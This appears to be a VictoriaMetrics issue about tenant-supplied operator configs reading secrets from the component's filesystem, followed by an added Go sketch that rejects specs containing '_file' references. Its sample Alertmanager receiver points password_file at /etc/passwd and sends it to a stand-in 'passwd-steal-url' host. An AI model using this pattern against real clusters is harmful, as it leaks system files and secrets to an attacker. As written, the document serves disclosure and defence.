Security improvements for filesystem access.
Currently, VictoriaMetrics components support reading secrets from the on-disk filesystem. This improves security in the general case, when the service owner doesn't share access to it with other users.
In the case of operator-based deployments, when scraping and alerting configuration is delegated to the users, it could be an issue.
For instance, vmalertmanagerconfig may have the following configuration:
kind: VMAlertmanagerConfig
spec:
  receivers:
    - name: webhook-read-passwd
      url: http://passwd-steal-url
      http_config:
        basic_auth:
          # path is resolved on the component's own filesystem
          password_file: /etc/passwd
We could extend the following configuration param https://docs.victoriametrics.com/operator/api/#arbitraryfsaccessthroughsmsconfig to the other components that use filesystem secrets.
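A sketch of the kind of deny check proposed above, written as an added example; it is not code from the issue or from the operator. It generalizes to any field whose key ends in `_file` (an assumed naming convention), and `findFileRefs`, `denyFileRefs` and the JSON rendering of the spec are hypothetical names and constructed input.

```go
package main

import (
	"encoding/json"
	"fmt"
	"sort"
	"strings"
)

// constructedSpec is a constructed JSON rendering of the spec shown above.
const constructedSpec = `{"receivers":[{"name":"webhook-read-passwd","url":"http://passwd-steal-url","http_config":{"basic_auth":{"password_file":"/etc/passwd"}}}]}`

// findFileRefs walks a decoded config and returns "path=value" for every
// non-empty string field whose key ends in "_file" (assumed convention).
func findFileRefs(node any, path string) []string {
	var hits []string
	switch v := node.(type) {
	case map[string]any:
		for k, child := range v {
			p := path + "." + k
			if s, ok := child.(string); ok && strings.HasSuffix(k, "_file") && s != "" {
				hits = append(hits, p+"="+s)
				continue
			}
			hits = append(hits, findFileRefs(child, p)...)
		}
	case []any:
		for i, child := range v {
			hits = append(hits, findFileRefs(child, fmt.Sprintf("%s[%d]", path, i))...)
		}
	}
	sort.Strings(hits) // map iteration order is random; keep output stable
	return hits
}

// denyFileRefs is a hypothetical admission check: with deny set, a
// user-supplied spec containing any filesystem reference is rejected.
func denyFileRefs(specJSON string, deny bool) error {
	var spec any
	if err := json.Unmarshal([]byte(specJSON), &spec); err != nil {
		return fmt.Errorf("decode spec: %w", err)
	}
	if refs := findFileRefs(spec, "spec"); deny && len(refs) > 0 {
		return fmt.Errorf("filesystem references not allowed: %s", strings.Join(refs, ", "))
	}
	return nil
}

func main() { fmt.Println(denyFileRefs(constructedSpec, true)) }
```

Rejecting at admission time reports the exact field path to the user, so a legitimate config can be moved to a Secret reference instead of a file path.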